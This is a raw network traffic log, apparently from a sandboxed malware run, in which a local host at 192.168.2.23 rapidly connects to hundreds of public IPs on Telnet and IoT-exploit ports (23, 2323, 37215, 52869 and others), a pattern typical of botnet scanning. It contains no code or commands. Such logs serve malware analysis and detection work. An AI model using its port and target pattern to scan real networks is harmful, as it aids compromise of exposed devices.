                                                                        Dec 6, 2024 00:37:17.421351910 CET80803608443.139.176.218192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421360970 CET8149260218.77.247.153192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421370983 CET844346258192.166.138.242192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421380043 CET80804883216.177.230.17192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421390057 CET3721558788210.207.191.104192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421400070 CET808040388154.211.50.52192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421408892 CET84435162292.247.69.60192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421417952 CET8057786205.206.30.221192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421427011 CET80803583854.118.74.41192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421437979 CET5286944326180.188.222.161192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421447992 CET81342427.62.201.148192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421457052 CET8080432062.152.124.161192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421468019 CET804694299.76.48.158192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421478987 CET80425868.107.105.120192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421488047 CET5286952340170.10.186.243192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421498060 CET808057234100.26.89.18192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421506882 CET555539906115.155.24.23192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421516895 CET757458148214.171.62.194192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421526909 CET803942253.76.178.29192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421536922 CET2348362205.253.16.96192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421545982 CET2340796210.63.192.243192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421555996 CET23234875446.225.80.103192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421566010 CET8054392174.68.245.171192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421575069 CET234886423.11.44.230192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421585083 CET4079623192.168.2.23210.63.192.243
                                                                        Dec 6, 2024 00:37:17.421585083 CET236000445.162.46.130192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421596050 CET2347318205.253.16.96192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421603918 CET4836223192.168.2.23205.253.16.96
                                                                        Dec 6, 2024 00:37:17.421603918 CET2350334173.136.2.215192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421606064 CET4886423192.168.2.2323.11.44.230
                                                                        Dec 6, 2024 00:37:17.421613932 CET2351802212.252.159.20192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421613932 CET5439280192.168.2.23174.68.245.171
                                                                        Dec 6, 2024 00:37:17.421613932 CET487542323192.168.2.2346.225.80.103
                                                                        Dec 6, 2024 00:37:17.421623945 CET235723070.169.138.45192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421626091 CET6000423192.168.2.2345.162.46.130
                                                                        Dec 6, 2024 00:37:17.421626091 CET4731823192.168.2.23205.253.16.96
                                                                        Dec 6, 2024 00:37:17.421633959 CET23234770246.225.80.103192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421638012 CET5033423192.168.2.23173.136.2.215
                                                                        Dec 6, 2024 00:37:17.421642065 CET5180223192.168.2.23212.252.159.20
                                                                        Dec 6, 2024 00:37:17.421644926 CET2359286185.89.66.87192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421650887 CET5723023192.168.2.2370.169.138.45
                                                                        Dec 6, 2024 00:37:17.421658039 CET233522040.17.181.231192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421667099 CET2344938154.18.241.234192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421678066 CET2356384204.46.166.245192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421680927 CET477022323192.168.2.2346.225.80.103
                                                                        Dec 6, 2024 00:37:17.421689987 CET2348638103.90.69.101192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421698093 CET4493823192.168.2.23154.18.241.234
                                                                        Dec 6, 2024 00:37:17.421700001 CET234895245.163.247.116192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421703100 CET5928623192.168.2.23185.89.66.87
                                                                        Dec 6, 2024 00:37:17.421703100 CET3522023192.168.2.2340.17.181.231
                                                                        Dec 6, 2024 00:37:17.421706915 CET5638423192.168.2.23204.46.166.245
                                                                        Dec 6, 2024 00:37:17.421710014 CET2342034151.148.78.149192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421720028 CET235158257.37.47.90192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421729088 CET808060250197.135.110.12192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421740055 CET8039316172.175.234.32192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421742916 CET4863823192.168.2.23103.90.69.101
                                                                        Dec 6, 2024 00:37:17.421751976 CET2344028209.71.201.106192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421752930 CET4895223192.168.2.2345.163.247.116
                                                                        Dec 6, 2024 00:37:17.421755075 CET4203423192.168.2.23151.148.78.149
                                                                        Dec 6, 2024 00:37:17.421762943 CET2346000209.130.127.153192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421770096 CET602508080192.168.2.23197.135.110.12
                                                                        Dec 6, 2024 00:37:17.421772957 CET2353176108.22.158.140192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421775103 CET3931680192.168.2.23172.175.234.32
                                                                        Dec 6, 2024 00:37:17.421777964 CET5158223192.168.2.2357.37.47.90
                                                                        Dec 6, 2024 00:37:17.421782970 CET2338742110.139.97.138192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421792030 CET2344660125.94.78.10192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421794891 CET4402823192.168.2.23209.71.201.106
                                                                        Dec 6, 2024 00:37:17.421801090 CET4600023192.168.2.23209.130.127.153
                                                                        Dec 6, 2024 00:37:17.421802044 CET233380819.75.47.225192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421812057 CET3874223192.168.2.23110.139.97.138
                                                                        Dec 6, 2024 00:37:17.421812057 CET2352074108.22.158.140192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421813965 CET4466023192.168.2.23125.94.78.10
                                                                        Dec 6, 2024 00:37:17.421814919 CET5317623192.168.2.23108.22.158.140
                                                                        Dec 6, 2024 00:37:17.421822071 CET2344536145.174.183.126192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421833038 CET2357422140.235.222.223192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421840906 CET23233543486.155.137.194192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421850920 CET234419278.10.102.90192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421860933 CET23537862.7.198.101192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421870947 CET2342938209.71.201.106192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421880007 CET23233397679.173.177.69192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421890974 CET234006882.188.91.41192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421901941 CET2345746220.172.63.114192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421911001 CET339762323192.168.2.2379.173.177.69
                                                                        Dec 6, 2024 00:37:17.421911955 CET234077263.151.178.96192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421921968 CET235500871.137.6.48192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421932936 CET235478234.6.47.75192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421941996 CET235352298.242.48.207192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421952963 CET235352298.242.48.207192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421961069 CET235478234.6.47.75192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421969891 CET235500871.137.6.48192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421979904 CET234077263.151.178.96192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421988010 CET2345746220.172.63.114192.168.2.23
                                                                        Dec 6, 2024 00:37:17.421998024 CET5352223192.168.2.2398.242.48.207
                                                                        Dec 6, 2024 00:37:17.421998024 CET234006882.188.91.41192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422008991 CET4077223192.168.2.2363.151.178.96
                                                                        Dec 6, 2024 00:37:17.422008991 CET2345080103.52.66.40192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422013998 CET5500823192.168.2.2371.137.6.48
                                                                        Dec 6, 2024 00:37:17.422019958 CET8039048222.32.92.206192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422028065 CET5478223192.168.2.2334.6.47.75
                                                                        Dec 6, 2024 00:37:17.422032118 CET4574623192.168.2.23220.172.63.114
                                                                        Dec 6, 2024 00:37:17.422032118 CET844334170168.92.239.221192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422033072 CET4006823192.168.2.2382.188.91.41
                                                                        Dec 6, 2024 00:37:17.422039032 CET4508023192.168.2.23103.52.66.40
                                                                        Dec 6, 2024 00:37:17.422041893 CET2342938209.71.201.106192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422050953 CET23537862.7.198.101192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422053099 CET3904880192.168.2.23222.32.92.206
                                                                        Dec 6, 2024 00:37:17.422060013 CET341708443192.168.2.23168.92.239.221
                                                                        Dec 6, 2024 00:37:17.422060966 CET234419278.10.102.90192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422072887 CET23233543486.155.137.194192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422072887 CET4293823192.168.2.23209.71.201.106
                                                                        Dec 6, 2024 00:37:17.422081947 CET2357422140.235.222.223192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422091961 CET2344536145.174.183.126192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422099113 CET5378623192.168.2.232.7.198.101
                                                                        Dec 6, 2024 00:37:17.422101974 CET2352074108.22.158.140192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422106981 CET4419223192.168.2.2378.10.102.90
                                                                        Dec 6, 2024 00:37:17.422108889 CET354342323192.168.2.2386.155.137.194
                                                                        Dec 6, 2024 00:37:17.422111034 CET5742223192.168.2.23140.235.222.223
                                                                        Dec 6, 2024 00:37:17.422112942 CET233380819.75.47.225192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422122955 CET4453623192.168.2.23145.174.183.126
                                                                        Dec 6, 2024 00:37:17.422122955 CET2359586217.11.150.181192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422130108 CET5207423192.168.2.23108.22.158.140
                                                                        Dec 6, 2024 00:37:17.422133923 CET235150468.31.102.175192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422142029 CET2343970103.52.66.40192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422149897 CET3380823192.168.2.2319.75.47.225
                                                                        Dec 6, 2024 00:37:17.422152042 CET2343052196.218.227.138192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422158003 CET5958623192.168.2.23217.11.150.181
                                                                        Dec 6, 2024 00:37:17.422163010 CET2335486124.178.178.153192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422164917 CET5150423192.168.2.2368.31.102.175
                                                                        Dec 6, 2024 00:37:17.422173023 CET232337396125.40.65.165192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422174931 CET4397023192.168.2.23103.52.66.40
                                                                        Dec 6, 2024 00:37:17.422178030 CET4305223192.168.2.23196.218.227.138
                                                                        Dec 6, 2024 00:37:17.422183990 CET235077682.210.121.89192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422194004 CET235829282.228.10.195192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422203064 CET2360864136.46.241.228192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422207117 CET3548623192.168.2.23124.178.178.153
                                                                        Dec 6, 2024 00:37:17.422211885 CET2350570161.101.173.141192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422218084 CET373962323192.168.2.23125.40.65.165
                                                                        Dec 6, 2024 00:37:17.422219038 CET5077623192.168.2.2382.210.121.89
                                                                        Dec 6, 2024 00:37:17.422224045 CET234883868.190.176.59192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422230959 CET5829223192.168.2.2382.228.10.195
                                                                        Dec 6, 2024 00:37:17.422231913 CET6086423192.168.2.23136.46.241.228
                                                                        Dec 6, 2024 00:37:17.422236919 CET2338678185.250.160.17192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422245026 CET5057023192.168.2.23161.101.173.141
                                                                        Dec 6, 2024 00:37:17.422246933 CET2339490182.102.180.60192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422257900 CET2359408154.106.23.130192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422262907 CET4883823192.168.2.2368.190.176.59
                                                                        Dec 6, 2024 00:37:17.422267914 CET234939658.156.9.17192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422270060 CET3867823192.168.2.23185.250.160.17
                                                                        Dec 6, 2024 00:37:17.422278881 CET23233628896.235.67.124192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422287941 CET3949023192.168.2.23182.102.180.60
                                                                        Dec 6, 2024 00:37:17.422288895 CET235638260.63.67.216192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422298908 CET372154116621.13.16.113192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422300100 CET4939623192.168.2.2358.156.9.17
                                                                        Dec 6, 2024 00:37:17.422300100 CET5940823192.168.2.23154.106.23.130
                                                                        Dec 6, 2024 00:37:17.422308922 CET80408464.249.18.39192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422318935 CET8037220194.163.148.125192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422331095 CET805350440.104.249.146192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422332048 CET5638223192.168.2.2360.63.67.216
                                                                        Dec 6, 2024 00:37:17.422338963 CET362882323192.168.2.2396.235.67.124
                                                                        Dec 6, 2024 00:37:17.422338963 CET4116637215192.168.2.2321.13.16.113
                                                                        Dec 6, 2024 00:37:17.422338963 CET4084680192.168.2.234.249.18.39
                                                                        Dec 6, 2024 00:37:17.422341108 CET8043242136.179.98.225192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422350883 CET804776694.134.232.205192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422358036 CET3722080192.168.2.23194.163.148.125
                                                                        Dec 6, 2024 00:37:17.422362089 CET80382723.102.151.229192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422362089 CET5350480192.168.2.2340.104.249.146
                                                                        Dec 6, 2024 00:37:17.422368050 CET4324280192.168.2.23136.179.98.225
                                                                        Dec 6, 2024 00:37:17.422373056 CET528693780279.129.72.164192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422383070 CET8042424157.228.236.27192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422390938 CET4776680192.168.2.2394.134.232.205
                                                                        Dec 6, 2024 00:37:17.422393084 CET808038390158.69.122.202192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422403097 CET8038788169.40.164.181192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422405958 CET3827280192.168.2.233.102.151.229
                                                                        Dec 6, 2024 00:37:17.422410011 CET3780252869192.168.2.2379.129.72.164
                                                                        Dec 6, 2024 00:37:17.422410011 CET4242480192.168.2.23157.228.236.27
                                                                        Dec 6, 2024 00:37:17.422411919 CET805309643.79.133.11192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422421932 CET4915236824117.116.60.186192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422430992 CET813469478.28.5.0192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422436953 CET3878880192.168.2.23169.40.164.181
                                                                        Dec 6, 2024 00:37:17.422439098 CET383908080192.168.2.23158.69.122.202
                                                                        Dec 6, 2024 00:37:17.422441006 CET75743403086.51.139.199192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422451019 CET80805971639.116.5.135192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422460079 CET3682449152192.168.2.23117.116.60.186
                                                                        Dec 6, 2024 00:37:17.422460079 CET8056874118.175.124.25192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422461033 CET5309680192.168.2.2343.79.133.11
                                                                        Dec 6, 2024 00:37:17.422461987 CET3469481192.168.2.2378.28.5.0
                                                                        Dec 6, 2024 00:37:17.422472000 CET80804056088.248.221.165192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422482967 CET597168080192.168.2.2339.116.5.135
                                                                        Dec 6, 2024 00:37:17.422482967 CET528695186427.76.195.81192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422482967 CET5687480192.168.2.23118.175.124.25
                                                                        Dec 6, 2024 00:37:17.422482967 CET340307574192.168.2.2386.51.139.199
                                                                        Dec 6, 2024 00:37:17.422492981 CET75744416659.9.127.185192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422502041 CET405608080192.168.2.2388.248.221.165
                                                                        Dec 6, 2024 00:37:17.422502995 CET55553510216.102.200.139192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422511101 CET5286954338157.77.71.177192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422523022 CET803450648.133.51.155192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422533989 CET3721544778154.235.218.105192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422543049 CET815908087.173.40.163192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422550917 CET592025555192.168.2.23203.33.233.245
                                                                        Dec 6, 2024 00:37:17.422550917 CET806040039.227.72.155192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422563076 CET75745987226.69.100.31192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422571898 CET80804243494.215.141.54192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422580957 CET84434248637.230.73.95192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422590017 CET5286955920128.91.58.4192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422599077 CET803437478.132.73.224192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422606945 CET8044886173.106.78.35192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422616005 CET808055486180.120.70.59192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422625065 CET808042800196.223.36.172192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422636032 CET808053162140.22.65.76192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422645092 CET528694146040.156.170.132192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422653913 CET8080420328.14.41.206192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422662020 CET757439076216.224.95.80192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422672033 CET844339824169.191.103.1192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422681093 CET5555496582.144.236.217192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422691107 CET808042762209.9.90.236192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422702074 CET757445952107.108.113.107192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422709942 CET75743445618.5.160.184192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422719002 CET8053212121.13.98.106192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422729969 CET55554352069.249.109.177192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422739029 CET803467215.208.50.250192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422748089 CET8055472121.142.208.105192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422758102 CET8057546198.206.241.104192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422768116 CET808048514109.3.50.60192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422776937 CET8150956124.175.99.173192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422785997 CET808033500140.24.155.93192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422792912 CET80803648264.132.168.64192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422807932 CET5286960274101.203.94.126192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422816038 CET80805165848.181.195.14192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422825098 CET808037144157.232.42.141192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422833920 CET8052294197.68.216.109192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422844887 CET8036152175.171.246.250192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422852039 CET80804811833.72.49.85192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422863007 CET805593484.119.107.118192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422873020 CET528693744094.177.142.161192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422882080 CET8036370156.90.240.187192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422889948 CET8040404139.210.155.192192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422899008 CET80803436083.248.54.126192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422908068 CET3721545652188.195.245.36192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422915936 CET555543718215.101.251.205192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422924995 CET8154110123.192.215.13192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422934055 CET80803810450.210.105.42192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422943115 CET8056086204.30.144.174192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422954082 CET814899281.55.21.230192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422962904 CET4915254280108.221.254.110192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422972918 CET8041790169.253.87.242192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422981024 CET55554792645.104.230.8192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422990084 CET5286942954221.56.144.117192.168.2.23
                                                                        Dec 6, 2024 00:37:17.422998905 CET805837415.46.95.211192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423007965 CET80805562481.101.181.75192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423007965 CET5428049152192.168.2.23108.221.254.110
                                                                        Dec 6, 2024 00:37:17.423010111 CET4179080192.168.2.23169.253.87.242
                                                                        Dec 6, 2024 00:37:17.423017979 CET2358760102.130.32.60192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423027992 CET555541842184.80.231.138192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423038006 CET234501040.226.195.151192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423049927 CET805058279.22.85.51192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423058987 CET808056476203.102.228.87192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423068047 CET3721552308220.130.230.90192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423077106 CET8038304178.16.80.106192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423086882 CET555555346221.232.130.20192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423095942 CET528694858045.52.252.78192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423105001 CET804567075.46.156.121192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423114061 CET2355594209.255.0.253192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423124075 CET23234646854.134.139.3192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423134089 CET844337352157.133.189.147192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423142910 CET808046410130.152.81.149192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423151016 CET491523434027.39.220.124192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423161030 CET8054212188.84.47.83192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423170090 CET813654039.43.84.54192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423178911 CET803923299.207.247.232192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423187971 CET8038142209.75.120.198192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423197031 CET80463385.66.245.147192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423208952 CET815917265.158.119.67192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423219919 CET8037098138.112.67.100192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423228979 CET80803348662.93.241.10192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423238039 CET805511664.77.154.219192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423247099 CET8141268179.41.218.103192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423257113 CET7574557269.174.94.208192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423265934 CET757440208158.99.48.169192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423275948 CET757451046129.30.155.167192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423285007 CET805726062.39.202.69192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423295021 CET8042070156.82.219.223192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423305035 CET805587056.100.184.78192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423321009 CET4915256896166.196.205.22192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423331022 CET55554051218.179.120.132192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423340082 CET55554786086.240.223.174192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423350096 CET808060798112.153.207.115192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423358917 CET808059598102.187.77.194192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423367977 CET491526086225.128.176.48192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423377037 CET4915247784168.216.138.12192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423387051 CET804934478.126.194.179192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423397064 CET4915260602121.177.118.150192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423408031 CET844341552105.12.76.241192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423417091 CET84434668616.50.226.176192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423425913 CET844335140209.141.18.141192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423435926 CET8057842196.158.249.168192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423444986 CET8046912116.138.251.1192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423454046 CET80537209.23.74.64192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423464060 CET808053158197.112.191.213192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423474073 CET8043258183.178.42.191192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423482895 CET80804191859.14.26.31192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423491001 CET55554578660.220.129.51192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423500061 CET8055668156.158.132.221192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423508883 CET80804614250.129.165.8192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423517942 CET491523755620.164.209.99192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423527002 CET8060098102.60.227.138192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423542023 CET5286935422185.249.96.80192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423552036 CET4915255846116.48.214.197192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423563004 CET8154248184.201.146.94192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423574924 CET84435424615.46.198.67192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423584938 CET80804525243.10.138.186192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423593998 CET804671023.157.2.214192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423604012 CET4915260360144.192.196.181192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423607111 CET542468443192.168.2.2315.46.198.67
                                                                        Dec 6, 2024 00:37:17.423614979 CET84435311095.133.117.213192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423621893 CET452528080192.168.2.2343.10.138.186
                                                                        Dec 6, 2024 00:37:17.423624992 CET805884273.149.43.253192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423628092 CET4671080192.168.2.2323.157.2.214
                                                                        Dec 6, 2024 00:37:17.423635006 CET803937080.180.109.86192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423639059 CET6036049152192.168.2.23144.192.196.181
                                                                        Dec 6, 2024 00:37:17.423643112 CET531108443192.168.2.2395.133.117.213
                                                                        Dec 6, 2024 00:37:17.423645020 CET805082679.205.134.177192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423655033 CET844349962125.95.228.225192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423656940 CET5884280192.168.2.2373.149.43.253
                                                                        Dec 6, 2024 00:37:17.423660040 CET84434751893.197.81.37192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423664093 CET808050988217.144.221.208192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423669100 CET757436370136.136.129.33192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423672915 CET3721553158143.151.72.28192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423675060 CET3937080192.168.2.2380.180.109.86
                                                                        Dec 6, 2024 00:37:17.423681974 CET4915242858110.77.244.54192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423692942 CET8051946160.64.200.250192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423702002 CET4915249374204.19.175.144192.168.2.23
                                                                        Dec 6, 2024 00:37:17.423705101 CET5082680192.168.2.2379.205.134.177
                                                                        Dec 6, 2024 00:37:17.423705101 CET5315837215192.168.2.23143.151.72.28
                                                                        Dec 6, 2024 00:37:17.423707962 CET499628443192.168.2.23125.95.228.225
